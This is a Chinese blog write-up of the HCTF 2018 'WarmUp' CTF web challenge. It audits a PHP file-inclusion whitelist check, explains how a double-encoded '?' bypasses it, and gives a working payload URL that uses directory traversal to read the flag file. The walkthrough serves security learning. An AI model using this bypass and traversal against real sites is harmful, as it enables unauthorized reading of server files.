• web:[HCTF 2018]WarmUp

    题目

    点进页面,页面只有一张滑稽脸,没有其他的提示信息

    查看网页源代码,发现source.php,尝试访问一下

    跳转至该页面,页面显示为一段php代码,需要进行代码审计

    1.  <?php
    2.     highlight_file(__FILE__);
    3.     class emmm
    4.     {
    5.         public static function checkFile(&$page)
    6.         {
    7.             //白名单验证
    8.             $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
    9.             if (! isset($page) || !is_string($page)) {
    10.                 echo "you can't see it";
    11.                 return false;
    12.             }//isset是判断page是否为空。由于传进来的page为一个字符串且不为空,所以返回false
    13.  
    14.             if (in_array($page, $whitelist)) {
    15.                //对输入进行判断,是否为白名单类的内容
    16.                 return true;
    17.             }/*in_array的意思是判断page里是否包含白名单里的内容 例如source.php  hint.php。
    18.               就是page=source.php或者hint.php才行.所以最后返回了false*/
    19.  
    20.  
    21.             $_page = mb_substr(
    22.                 $page,
    23.                 0,
    24.                 mb_strpos($page . '?', '?')
    25.             );
    26.        /*这里mb_substr 是个截断,返回0到mb_strpos之间的内容,而mb_strpos 则是查找第一次出现的位置,所以基本可以理解为获取page 两个?之间的字符串,也就是获取file两个?之间的字符串,放到url中就是http://ip/?file=ddd?中的file=ddd*/
    27.             if (in_array($_page, $whitelist)) {
    28.                 return true;
    29.             }
    30. /*经过上面的截断代码,page=source.php  所以返回true ,文件可以得到包含,结束,下面的代码就不用在执行了*/
    31.  
    32.             $_page = urldecode($page);//进行url解码
    33.             //输入的url会进行一次解码,通过这个函数进行再一次解码,所以对“?”要进行二次编码==》%253F(%25是%的url编码,进行过一次后为%3F,在进行一次解码后变为“?”)
    34.             $_page = mb_substr(
    35.                 $_page,
    36.                 0,
    37.                 mb_strpos($_page . '?', '?')
    38.             );
    39.             if (in_array($_page, $whitelist)) {
    40.                 return true;
    41.             }
    42.             echo "you can't see it";
    43.             return false;
    44.         }
    45.     }
    46.  
    47.     if (! empty($_REQUEST['file']) //输入不能为空
    48.         && is_string($_REQUEST['file'])//判断是否为string类型
    49.         && emmm::checkFile($_REQUEST['file'])//调用emm类中的checkFile方法
    50.     ) {
    51.         include $_REQUEST['file'];
    52.         exit;
    53.     } else {
    54.         echo "
      https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    55.     }  
    56. ?>

    先访问hint.php看看有没有别的提示信息

    根据提示信息,进行目录穿越可获得flag,这里flag写了四次,可能使用四个或五个../

    构造payload

    http://1f0787c3-39e3-43b6-9583-f8ecb87aae1c.node4.buuoj.cn:81/?file=hint.php%253F../../../../../ffffllllaaaagggg

    得到flag

    总结

    mb_substr()函数返回字符串的一部分,substr()函数,只针对英文字符,如果要分割的中文文字则需要使用mb_substr()。

    若start参数是负数且length小于或等于start,则length为0

    如果在测试时没有匹配到指定符号,将返回字符串长度

    代码审计参考链接:

    [HCTF 2018]WarmUp_ke1nys的博客-CSDN博客

    [HCTF 2018]WarmUp_浑水摸鱼的咸鱼的博客-CSDN博客

  • 相关阅读:
    阿里云认证 | 2023年ACP认证考试大揭秘
    3个密码学相关的问题
    ActiViz中的纹理映射
    从根上理解elasticsearch(lucene)查询原理(1)-lucece查询逻辑介绍
    外部工具/外网无法连接mysql本地数据库
    1.vue3脚手架在vscode下面建立
    Kotlin中的数组
    推进生态社会化分工 与伙伴共担未来 数商云受邀出席京东科技合作伙伴论坛
    3D感知技术(2)3D数据获取技术概述
    微服务框架 SpringCloud微服务架构 5 Nacos 5.1 认识和安装Nacos
  • 原文地址:https://blog.csdn.net/gsumall04/article/details/133142502